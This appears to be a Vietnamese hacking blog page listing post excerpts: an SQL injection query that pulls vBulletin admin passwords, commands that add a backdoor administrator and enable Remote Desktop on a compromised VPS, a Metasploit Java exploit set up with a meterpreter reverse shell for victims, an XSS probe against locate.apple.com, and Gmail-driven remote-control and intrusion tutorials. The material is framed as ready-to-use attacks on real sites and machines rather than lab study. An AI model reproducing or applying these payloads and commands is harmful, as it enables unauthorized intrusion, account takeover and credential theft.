Hacking - Buzz™ * Cảm Ơn Các Bạn Đã Ghé Thăm Website *

[Tutorial Video] SQL lab Injection

Xem Thêm

 

Điều khiển máy tính từ xa qua Gmail

Có một vài tiện ích cho phép tạo kết nối điều khiến từ xa với máy tính. Nếu bạn đang cần gấp một kết nối để điều khiển máy tính từ xa mà chỉ yêu cầu mức cơ bản với cấu hình tối thiểu thì bạn có thể thực hiện thông qua tài khoản Gmail. sRemote là một ứng dụng bỏ túi nhỏ cho phép điều khiển từ xa máy tính thông qua tài khoản Gmail. Chương trình cho phép thực hiện một số câu lệnh cơ bản trên máy đầu xa qua Gmail.

Tải sRemote về máy. Giải nén file zip trong một thư mục. Khi sử dụng sRemote lần đầu tiên, chương trình sẽ đề nghị người dùng tạo một mật khẩu để truy cập máy tính mà sRemote đang chạy trên đó.

sremote1

Lưu ý rằng không nên cung cấp mật khẩu này cho người khác bởi vì bất cứ ai có mật khẩu này đều có thể điều khiển từ xa máy tính của bạn.

Bước tiếp theo liên quan đến việc thiết lập chứng thực Gmail cho sRemote. Chỉ cần kích vào Gmail settings và nhập địa chỉ Gmail, mật khẩu và địa chỉ hồi đáp.

sremote2


password() ;command() ;

Với “password()” là mật khẩu người dùng đã cấu hình khi khởi động sRemote và “command()” là bất cứ câu lệnh nào mà sRemote hỗ trợ. Những câu lệnh này phải nằm trong dòng subject của email.

sremote4

sRemote chấp nhận những câu lệnh sau:

1. screenshot() ;
2. shutdown() ;
3. logoff() ;
4. restart() ;
5. abort() ;
6. run(program,parameters) ;
7. play(path) ;
8. msg(text) ;
9. log(text) ;
10. exit() ;
11. beep() ;
12. forceshut() ;
13. mail(sender,password,receiver,body,subject) ;
14. processes() ;
15. ping(address) ;
16. getfile(path) ;
17. delfile(path) ;
18. deldir(path) ;
19. uptime() ;
20. copy(oldpath,newpath) ;
21. move(oldpath,newpath) ;
22. help() ;

Xét tổng thể thì sRemote là một chương trình tiện dụng và thực sự hữu ích khi ai đó đang cần gấp một kết nối điều khiển từ xa trong vài phút. Có hai điểm cần được cải thiện trong sRemote. Thứ nhất là sRemote không hỗ trợ các địa chỉ Google Apps mà cũng sử dụng công nghệ của Gmail. Thứ hai, không có xác nhận cho biết câu lệnh có được thực hiện trên máy tính đầu xa hay không. Có lẽ, cần có một email hồi đáp thông báo rằng, câu lệnh đã được thực hiện thành công trên máy đầu xa.

Link sRemote: https://sites.google.com/site/venussoftr...ects=0&d=1


NamNguyen (Theo MakeTechEasier)

Xem Thêm

 

Hack VBB - Chiếm quyền admin thông qua quyền mod

Các bạn xem video sẽ hiểu


Good Luck

Xem Thêm

 

SQLi Qua MOD Topx All Ver vBB + Login with Cookie



Đây là bản Download chỉ 6,6mb nhưng Extract ra là 400mb.
http://www.mediafire.com/?jemjpw964db53fm
Đây là đoạn code Querry mình sử dụng:
ajax.php?do=inforum&result=15&listforumid=-14 ) /*!union select*/ 1,2,3,4,5,6,password,8,9,10 from user where userid=1– -&result=15

Với userid=1 là số thứ tự của user mún lấy

Xem Thêm

 

Hack Vps Từ shell

Đầu tiên execute command trên con shell đó >

net user l33t p4$sword /add 

l33t=username p4$sword=password
Bây giờ để truy cập quản trị cho người sử dụng của bạn> excute command
Code:
net localgroup administrators l33t /add
 Sau đó thực hiện kết nối tới VPS
Nếu VPS một ip tĩnh nhưng không kết nối vào (mstsc) sử dụng các lệnh để cho phép người dùng từ xa:


Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f


 

Chú Ý:

Coppy phải ghi rõ nguồn KunGa™ - Blog IT

Xem Thêm

 

Exploiting Java Applet JAX-WS Remote Code Execution



Recientemente se ha publicado una nueva vulnerabilidad en Java, denominada Java Applet JAX-WS Remote Code Execution descubierta por @_juan_vazquez_ la cual afecta a la versión 1.7.0_07-b10 y anteriores.
El exploit respectivo para aprovecharse de esta vulnerabilidad se encuentra respectivamente en los modulos de Metasploit y se puede utilizar con tal solo realizar un msfupdate.
El modulo disponible en Metasploit para esta vulnerabilidad se aprovecha de los JAX-WS classes desde un Java Applet para ejecutar código arbitrario Java.
Los procedimientos y requerimientos para explotar esta vulnerabilidad son muy simples, solo basta con tener BackTrack y un Sistema Virtual para realizar las pruebas.

REQUERIMIENTOS:

Backtrack 5 R1 - R2 o R3 (Atacante)
Metasploit Framework (Atacante)
Windows XP - 7 (Victima)
Google Chorme, Firefox o IE (Victima)


PROCEDIMIENTO DEL ATAQUE:

Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
------------------------------------------------------------------------------------------------------------------
use exploit/multi/browser/java_jre17_jaxws
set PAYLOAD windows/meterpreter/reverse_tcp
set SRVHOST 192.168.1.19
set TARGET 1
set LHOST 192.168.1.19
exploit
------------------------------------------------------------------------------------------------------------------



Como ya es de conocimiento y costumbre, estos comandos creara una URL que sera enviada a al usuario para que lo ejecute desde cualquier navegador web, ya sea Google Chorme, Firefox, Internet Explorer u Opera que contenga la version del Java vulnerable 1.7.0_07-b10 y anteriores.

Seguidamente si el usuario logra ejecutar la URL generada en cualquier Sistema Operativo o Navegador, lograremos obtener una session metepreter como se aprecia en la siguiente imagen:

Por lo tanto, solo quedaría ejecutar los respectivos comandos de Explotación y Post-Explotacion para aprovecharnos del sistema que hemos vulnerable con una simple URL gracias a este nuevo exploit recién salida del horno.



VIDEO-TUTORIAL:


 

Xem Thêm

 

H­ướng dẫn tạo Sock 5 private bằng SSH

1. Sử dụng Putty
Nhân tiện được thằng bạn cho con VPS mình có cài hệ điều hành Centos và cài SSH để có thể tạo sock5 Private luôn. Nếu bạn nào không có host hỗ trợ SSH có thể vào các link này để đăng ký




Thông số VPS của mình:
ip=36.55.234.191
port=3843 (Port cấu hình SSH mặc định là port 22)

Bước 1: Cấu hình host hỗ trợ SSH. VPS của mình cài centos vậy chỉ cài gói SSHD là okie.
Bước 2: Download phần mềm Putty
Link Download :http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html
lựa chọn phiên bản phù hợp rồi cái nhé
Bước 3: Cấu hình
-Bật chương trình Putty phù hợp với thông số cấu hình SSH


-Vào Tab connection->SSH->Tunnels cấu hình như thông số trong hình
Phần cấu hình source port: có thể cấu hình tùy chọn ở đây mình chọn 1234 cho dễ nhớ


-Sau khi open sẽ đăng nhập vào host SSh như hình sau


-Tiếp theo cấu hình trình duyêt. Mình hay sử dụng firefox nên cấu hình trên firefox còn với các trình duyệt khác tương tự


-Cuối cung vào kiểm tra địa chỉ IP đã được tạo chưa


Chú Ý: Trong quá trình sử dụng Sock5 Private bằng SSH luôn luôn phải kết nối với host SSH. nếu bạn disable thì cũng mất kết nối luôn

2. Sử dụng Tunnerlier
Mình dùng VPS ví dụ trên luôn
Bước 1: Download phần mềm tunnerlier  https://www.box.com/s/c3yakh69hjdtv3u0oqnb
Bước 2: 
-Bật chương trình Tunnerlier và làm như theo hướng dẫn sau đó login


- Vào tab service cấu hình như sau


-Cấu hình trên trình duyệt



-Kiểm tra đã tạo sock thành công hay chưa
http://showip.com



Chú Ý: Trong quá trình sử dụng host SSH luôn phải bật nhé

Xem Thêm

 

TuT khai thác bug mod ChangUonDyU - Advanced Statistics

Tut này của bạn parkdream1 r00t-team diễn đàn XGR nhé
Gần đây trên mạng xôn xao về việc 1 số diễn đàn bị hack bởi lỗi này
Mình xin phép phân tích như sau
1/ Đoạn code bị lỗi



Ở đây không kiểm tra giá trị của $_REQUEST['listforumid'] nhập vào
Ta có thể khai thác bằng cách thêm ")" để kết thúc query và thêm vào 1 query mới
2/ Khai thác

Hình ảnh của 1 REQUEST bình thường



Thử order xem sao

giờ đến union select thử

Thơm rồi
root@localhost : forum : 5.5.27
Đến đây chắc ai cũng biết phải làm gì tiếp theo nhỉ

Xem Thêm

 

Tut check XSS locate.apple.com theo phương thức Post

Victim: locate.apple.com

Công cụ: Live HTTP để bắt các request
Bước 1: Vào trang chủ:locate.apple.com
Click chuột vào tab Services, Bật Live HTTP sau đó bắt request

Bước 2:Bật Live HTTP chương trình như sau


Bước 3:Các bạn nhìn thấy request Post trong hình rồi bây giờ click tab header->Để ý vào mục Post-> sau đo click vào Replay để request lại

Bước 4:Để ý trong nội dung Send Post content?. Mình sẽ thêm Script XSS ở đây mình thêm script sau
<script>alert('Check by kakavn_85')</script>  sau vị trí location=

Sai đó ấn nút replay đợi 1 lúc sẽ hiện ra kết quả như sau

Xem Thêm

 

200 TUT của HCE

Cái này bị thất lạc vì link die nay anh em HCE vừa mới tìm lại được
http://www.mediafire.com/?pm55krbicizbc

Xem Thêm

 

Tut Xâm nhập máy tính = Backtrack 5 (Phần 2)

               Về remote desktop sau khi đã chiếm được cmd của victim. Hôm nay mình xin làm tiếp phần remote desktop . Mình sẽ sử dụng VNC remote desktop . Nào mời các bạn cùng tham khảo

Xem Thêm

 

Tut Xâm nhập máy tính = Backtrack 5 (Phần 1)

               Mời các newbie tìm hiểu về metaploit hiểu thêm về cách xâm nhập máy tính. bài này mang tính chất tham khảo cho newbie nên các pro biết rồi thì xin nhẹ tay cho ^.^ Đây là tut chiếm CMD victim. bài sau mình sẽ hướng dẫn cách remote desktop khi đã có cmd victim

Xem Thêm